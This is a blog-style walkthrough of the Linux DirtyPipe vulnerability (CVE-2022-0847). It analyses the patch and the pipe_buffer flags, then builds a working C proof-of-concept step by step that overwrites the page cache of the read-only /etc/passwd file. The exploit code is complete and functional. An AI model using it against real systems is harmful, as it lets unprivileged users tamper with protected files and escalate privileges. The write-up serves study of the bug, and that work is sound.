DirtyPipe CVE-2022-0847
Author: stdnoerr (@stdnoerr)
Before DirtyCOW, I looked at DirtyPipe for CVE n-day practice. I wanted to understand how it worked, and it was a fairly new one at that time (July 2023). But it's been a while since I did it, so this one will be more of a walkthrough than a story-time. I will also include steps that I didn't originally do. I will use Linux kernel v5.16.10 as the target environment for developing the exploit. Let's jump right in!
Environment
There's nothing special required for the environment. You just have to download the kernel source and compile it with the default config. If you don't know how to compile it, follow this blog. My setup can be found here if you don't want to set it up yourself. The setup includes the bzImage and an initramfs.
Analysis
The Patch
As in the previous post, we will start with the patch commit:
diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c15e..6dd5330f7a9957 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
 		return 0;
 
 	buf->ops = &page_cache_pipe_buf_ops;
+	buf->flags = 0;
 	get_page(page);
 	buf->page = page;
 	buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
 			break;
 
 		buf->ops = &default_pipe_buf_ops;
+		buf->flags = 0;
 		buf->page = page;
 		buf->offset = 0;
 		buf->len = min_t(ssize_t, left, PAGE_SIZE);
The following message accompanied the patch:
lib/iov_iter: initialize "flags" in new pipe_buffer
The functions copy_page_to_iter_pipe() and push_pipe() can both allocate a new pipe_buffer, but the "flags" member initializer is missing.
The patch and message are straightforward: the vulnerability is an uninitialized member bug. The uninitialized member is flags of struct pipe_buffer. The bug is present in two pipe-related functions: copy_page_to_iter_pipe() and push_pipe().
Pipe Buffer
Pipes and FIFOs (also known as named pipes) provide a unidirectional interprocess communication channel. A pipe has a read end and a write end. Data written to the write end of a pipe can be read from the read end of the pipe. — pipe(7)
By convention, the first descriptor returned by pipe() is the read end and the second is the write end. Data can be written to and read from a pipe at any time, and unread data persists until it is read. Reading from an empty pipe or writing to a full pipe (discussed later) blocks, although a pipe can be made non-blocking by passing O_NONBLOCK to the pipe2 syscall.
In the Linux kernel, pipes are implemented as a pseudo filesystem (pipefs), and the returned file descriptors refer to pseudo files in this filesystem. In fact, both file descriptors refer to the same pseudo file (the same inode), opened with different modes: the first read-only and the second write-only. The inode of this file holds a struct pipe_inode_info in its inode->i_pipe member (inodes store the metadata of files).
Since this filesystem has no backing storage on disk, the data is kept in pages of main memory. Each pipe_buffer references a single page through its pipe_buffer->page member, and a pipe can have multiple buffers. The buffers are stored in the pipe_inode_info->bufs array, which is used as a ring.
By default, a pipe gets 16 buffers, making the default capacity 65,536 bytes (16 * 4096). A pipe's capacity can be changed with fcntl: F_GETPIPE_SZ queries the size (in bytes) and F_SETPIPE_SZ sets it. The minimum size is the system's page size (4096 bytes on most systems) and the maximum for an unprivileged user is 1 MiB (1,048,576 bytes), although root can change this maximum via /proc/sys/fs/pipe-max-size.
flags
Since the vulnerability is the missing initialization of the flags member, this member deserves special attention. Its possible values are defined right above struct pipe_buffer. We have to figure out which flag could help us exploit the vulnerability if it is left over (not cleared) from a previous use of the buffer. At that time (July 2023), I concluded the following about each flag:
flag | description |
---|---|
PIPE_BUF_FLAG_LRU | set at multiple locations in splice when a page is acquired from a buffer; the only use found was in FUSE, which just adds the page to the LRU cache |
PIPE_BUF_FLAG_ATOMIC | never set, never used |
PIPE_BUF_FLAG_GIFT | set by the user through splice and vmsplice; if this flag is not set, the userspace page is not reused for kernel copying in (vm)splice |
PIPE_BUF_FLAG_PACKET | for pipes with the O_DIRECT flag (can be set through fcntl or pipe2), the kernel does not perform buffering and writes the iovecs as "packets"; no useful use found |
PIPE_BUF_FLAG_CAN_MERGE | for pipes without O_DIRECT; set in pipe_write and used to check whether new data written to the pipe can be copied into this buffer |
PIPE_BUF_FLAG_WHOLE | set by the user in pipe2; if read doesn't read exactly n bytes, an error is returned |
PIPE_BUF_FLAG_LOSS | weird flag, for some kind of data loss; the only use found sets pipe->note_loss = true when no more data can be read from the buffer |
The only interesting flags seemed to be PIPE_BUF_FLAG_GIFT and PIPE_BUF_FLAG_CAN_MERGE.
PIPE_BUF_FLAG_GIFT
At first glance, PIPE_BUF_FLAG_GIFT seems like the right choice, since its description tells us that userspace essentially "gifts" the page to the kernel, indicating that userspace no longer needs the page and the kernel is free to repurpose it. But the flag doesn't block any attempts to write to the page, and doing so can lead to weird behavior.
But in order to actually understand this flag's purpose and whether or not it will help us in exploiting the vulnerability, we need to look at the underlying code.
This flag is actually the kernel-space equivalent of the SPLICE_F_GIFT flag that can be passed to the splice and vmsplice syscalls. The splice syscall moves data between two file descriptors without copying it between kernel space and userspace; one of the file descriptors has to be a pipe. vmsplice moves data between a pipe and a memory region instead of a file descriptor.
SPLICE_F_GIFT is unused by splice, but when used with vmsplice it allows the kernel to repurpose the underlying page. SPLICE_F_GIFT causes PIPE_BUF_FLAG_GIFT to be set on the pipe_buffer modified by the syscall.
But after reading the code multiple times, I found that PIPE_BUF_FLAG_GIFT is a hint rather than an obligation: the kernel is allowed to repurpose the page but NOT required to. The only places where the page is actually repurposed can be seen here and here.
Since these uses were outside of the core pipe code, I decided not to pursue them. But as a side effect of all this code review, I found a call path between splice and copy_page_to_iter_pipe().
In this path, the page passed to copy_page_to_iter() belongs to the file being read (spliced) from. The pages are collected into a pagevec by this line, and each page is then passed to copy_page_to_iter(). This will come in handy later.
PIPE_BUF_FLAG_CAN_MERGE
PIPE_BUF_FLAG_PACKET and PIPE_BUF_FLAG_CAN_MERGE are opposites of each other. The former confines each write (and the corresponding read) to its own pipe_buffer, while the latter allows data from multiple writes to share a single pipe_buffer. This can be dangerous if the page being written to is one that shouldn't be shared. This hypothesis is also supported by the CVE description, which reads:
An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.
The pipe_buffer-sharing flag is only set here in pipe_write, the function responsible for writes to pipe file descriptors. It is set when a new pipe_buffer is allocated and O_DIRECT is not set on the pipe. A new buffer is allocated when the previous one is full or cannot be shared (doesn't have the PIPE_BUF_FLAG_CAN_MERGE flag). But the page in this case is allocated via alloc_page, so it is completely fine to write to it.
But if we look at the patch again, the buffer filled in copy_page_to_iter_pipe() doesn't get a freshly allocated page; it references the page that was passed in, so copy_page_to_iter_pipe() is probably our target function. And since we have a valid call path between splice and copy_page_to_iter_pipe(), we can test this theory.
The splice syscall also matters from another angle, which makes it a requirement for exploiting this vulnerability. The function copy_page_to_iter_pipe() is only called when the struct iov_iter * passed to copy_page_to_iter() has the type ITER_PIPE (indicating that the iterator's destination is a pipe), and as it turns out, this type is only set in splice.
Mid summary
So we identified that PIPE_BUF_FLAG_CAN_MERGE is the flag we need to leave in the uninitialized flags member for copy_page_to_iter_pipe(), since that is the function that puts the provided page into the pipe, and we need to reach that function via the call path discovered from splice.
Exploitation
1. Create pipe
First things first, we need to allocate a pipe in order to exploit the vulnerability. While we are at it, let's also open a file we only have read access to, both to use with splice and to test whether we can actually write to it. For now, let's use /etc/passwd as our target file.
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
return 0;
}
2. Assign PIPE_BUF_FLAG_CAN_MERGE to pipe's buffers
We need to make sure that, when the splice syscall reaches copy_page_to_iter_pipe(), the pipe_buffer already has the PIPE_BUF_FLAG_CAN_MERGE flag. We will use this code path in pipe_write to do this. It's a pretty obvious code path that is triggered whenever we write to the pipefd[1] file descriptor. We just need to fill the pipe completely to set the flag on all buffers, and then simply read the data back. This drains the pipe and releases the pages, but the flag remains. Since, by default, a pipe has 16 buffers and each can hold 4096 bytes, we would have to write 16*4096 bytes. But we can shrink the pipe to reduce the number of buffers and reach the goal sooner. We will set the pipe's size to 4096 bytes (1 buffer), so we only have to write 4096 bytes to it.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
char buffer[4096];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
// 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
write(pipefd[1], buffer, sizeof(buffer));
read(pipefd[0], buffer, sizeof(buffer));
return 0;
}
3. Trigger vulnerability via splice
Since the path to the vulnerable function copy_page_to_iter_pipe() goes through splice and splice_file_to_pipe(), we will splice from the target file into the pipe. Since copy_page_to_iter_pipe() gets the file's page, the pipe buffer's page will be replaced with the file's page, while the buffer's flags still hold the stale PIPE_BUF_FLAG_CAN_MERGE. Subsequent writes to the pipe should then go into the file's page, even though the file was opened read-only. We splice just 1 byte, the lowest value possible, to trigger the vulnerability.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
char buffer[4096];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
// 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
write(pipefd[1], buffer, sizeof(buffer));
read(pipefd[0], buffer, sizeof(buffer));
// 3. Trigger the vulnerability via splice
if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
perror("splice");
close(fd);
close(pipefd[0]);
close(pipefd[1]);
return 1;
}
return 0;
}
4. Write to the target file
At this point, the file's page is being used as the pipe_buffer's backing page. Now, writing to the pipe should overwrite the file's contents (in the page cache).
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#define TARGET_FILE "/etc/passwd"
int main() {
int fd;
int pipefd[2];
char buffer[4096];
// 1. Create pipe and open target file
if ((fd = open(TARGET_FILE, O_RDONLY)) == -1) {
perror("open");
return 1;
}
if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
}
// 2. Shrink the pipe to 4096 bytes, fill the pipe and then drain it
fcntl(pipefd[0], F_SETPIPE_SZ, sizeof(buffer));
write(pipefd[1], buffer, sizeof(buffer));
read(pipefd[0], buffer, sizeof(buffer));
// 3. Trigger the vulnerability via splice
if (splice(fd, NULL, pipefd[1], NULL, 1, 0) < 0) {
perror("splice");
close(fd);
close(pipefd[0]);
close(pipefd[1]);
return 1;
}
// 4. Overwrite the target file
write(pipefd[1], "stdnoerr", 8);
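lseek(fd, 0, SEEK_SET);
// Read back the beginning of the file to see the overwrite
ssize_t n = read(fd, buffer, 60);
if (n < 0) {
perror("read");
return 1;
}
buffer[n] = '\0'; // Null-terminate after the bytes actually read
printf("Data read from target file: %s\n", buffer);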
return 0;
}
Output

The r of root is still there before the string stdnoerr. This is because, when we spliced the page, the pipe buffer's length was set to the number of bytes we spliced (1), so the next write was appended right after that byte. This highlights a limitation of DirtyPipe: it cannot overwrite the first byte of the file. But luckily, this is rarely required.
Limitations
DirtyPipe has a few limitations:
- It cannot overwrite the first byte
- It cannot write more than PAGE_SIZE - 1 bytes
- It cannot overwrite arbitrary memory pages; the data to be overwritten should belong to a file on disk
- It cannot write beyond the file's original size
Conclusion
It was fun trying to understand DirtyPipe, unraveling it like a puzzle and then putting the pieces together to make an exploit. The vulnerability turned out to be quite simple and easy to exploit, albeit with some limitations.
Hopefully, it was helpful to you as well. If you find any mistakes or want to chat, hit me up on Discord or Twitter.